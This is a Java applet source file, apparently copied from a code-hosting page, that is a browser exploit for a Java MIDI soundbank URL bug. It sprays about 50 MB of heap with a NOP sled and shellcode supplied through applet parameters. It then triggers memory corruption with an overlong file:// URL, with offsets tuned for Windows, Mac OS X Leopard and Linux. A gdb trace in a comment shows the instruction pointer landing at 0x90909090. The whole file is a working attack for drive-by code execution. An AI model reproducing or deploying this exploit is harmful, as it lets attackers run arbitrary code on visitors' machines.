143 lines
3.3 KiB
Java
143 lines
3.3 KiB
Java
|
|
||
|
import javax.sound.midi.*;
|
||
|
import java.io.*;
|
||
|
import java.nio.*;
|
||
|
import java.net.*;
|
||
|
|
||
|
/*
|
||
|
*
|
||
|
* comments from KF on Mac OS X:
|
||
|
*
|
||
|
Spray heap
|
||
|
|
||
|
Invalid memory access of location 0000000f eip=90909090
|
||
|
|
||
|
Program received signal EXC_BAD_ACCESS, Could not access memory.
|
||
|
Reason: KERN_PROTECTION_FAILURE at address: 0x0000000f
|
||
|
[Switching to process 385 thread 0x15107]
|
||
|
0x90909090 in _NSReadAttributedStringFromURLOrData ()
|
||
|
(gdb) bt
|
||
|
#0 0x90909090 in _NSReadAttributedStringFromURLOrData ()
|
||
|
#1 0x255a255a in ?? ()
|
||
|
*
|
||
|
*/
|
||
|
|
||
|
public class AppletX extends java.applet.Applet
|
||
|
{
|
||
|
private IntBuffer [] mem;
|
||
|
|
||
|
public void init()
|
||
|
{
|
||
|
String fName = "";
|
||
|
|
||
|
fName = repeat('/', 303);
|
||
|
|
||
|
// detect OS
|
||
|
String os = System.getProperty("os.name").toLowerCase();
|
||
|
if (os.indexOf( "win" ) >= 0)
|
||
|
fName = repeat('/', 302); // 1.6.0_u16,u11
|
||
|
// fName = repeat('/', 304); // 1.5.0_u21 (problems lurking)
|
||
|
else if (os.indexOf( "mac" ) >= 0)
|
||
|
//fName = repeat('/',1118); // OSX Snow Leopard
|
||
|
fName = repeat('/',1080); // OSX Leopard
|
||
|
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0)
|
||
|
fName = repeat('/', 1337); // not tested
|
||
|
else
|
||
|
// not supported
|
||
|
return;
|
||
|
|
||
|
// heap sprayed info starts at 0x25580000+12 but we need to be fairly ascii safe. 0x80 will not fly
|
||
|
// fName = "file://" + fName + "$\"$\"$\"$\"$\"$\""; // 1.5.x
|
||
|
fName = "file://" + fName + "Z%Z%Z%Z%Z%Z%";
|
||
|
|
||
|
// trigger vuln
|
||
|
try
|
||
|
{
|
||
|
mem = spray(getParameter("sc"), getParameter("np"));
|
||
|
// System.out.println("Sprayed!");
|
||
|
|
||
|
MidiSystem.getSoundbank(new URL(fName));
|
||
|
|
||
|
// just in case, thread doesn't typically return from above :)
|
||
|
while (true)
|
||
|
{
|
||
|
Thread.sleep(10);
|
||
|
}
|
||
|
}
|
||
|
catch(Exception e)
|
||
|
{
|
||
|
System.out.println(e);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
|
||
|
public static String repeat(char c,int i)
|
||
|
{
|
||
|
String tst = "";
|
||
|
|
||
|
for (int j = 0; j < i; j++)
|
||
|
{
|
||
|
tst = tst+c;
|
||
|
}
|
||
|
return tst;
|
||
|
}
|
||
|
|
||
|
|
||
|
// based on:
|
||
|
// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
|
||
|
public static short[] HexDecode(String s)
|
||
|
{
|
||
|
short[] data = new short[s.length()/2];
|
||
|
|
||
|
for (int i = 0; i < s.length(); i += 2)
|
||
|
{
|
||
|
char c1 = s.charAt(i);
|
||
|
char c2 = s.charAt(i + 1);
|
||
|
|
||
|
int comb = Character.digit(c1, 16) & 0xff;
|
||
|
comb <<= 4;
|
||
|
comb += Character.digit(c2, 16) & 0xff;
|
||
|
data[i/2] = (short)comb;
|
||
|
}
|
||
|
return data;
|
||
|
}
|
||
|
|
||
|
public final IntBuffer [] spray(String sc, String np)
|
||
|
{
|
||
|
short [] sc_bytes = HexDecode(sc);
|
||
|
short [] np_bytes = HexDecode(np);
|
||
|
|
||
|
return spray (sc_bytes, np_bytes);
|
||
|
}
|
||
|
|
||
|
public final IntBuffer [] spray(short[] sc, short[] np)
|
||
|
{
|
||
|
int cnt = 50; // total 50 mb
|
||
|
int sz = 1024*1024; // 1 mb
|
||
|
int nops = (sz / 4) - (sc.length);
|
||
|
|
||
|
IntBuffer [] ret = new IntBuffer[cnt];
|
||
|
|
||
|
for (int bi = 0; bi < cnt; bi++)
|
||
|
{
|
||
|
IntBuffer ib = IntBuffer.allocate(sz / 4);
|
||
|
|
||
|
for (int i = 0; i < nops; ++i)
|
||
|
ib.put((np[0]
|
||
|
| (np[1] << 8)
|
||
|
| (np[2] << 16)
|
||
|
| (np[3] << 24)));
|
||
|
// ib.put(0x90909090);
|
||
|
|
||
|
for (int i = 0; i < sc.length; )
|
||
|
ib.put((sc[i++]
|
||
|
| (sc[i++] << 8)
|
||
|
| (sc[i++] << 16)
|
||
|
| (sc[i++] << 24)));
|
||
|
ret[bi] = ib;
|
||
|
}
|
||
|
return ret;
|
||
|
}
|
||
|
}
|
||
|
|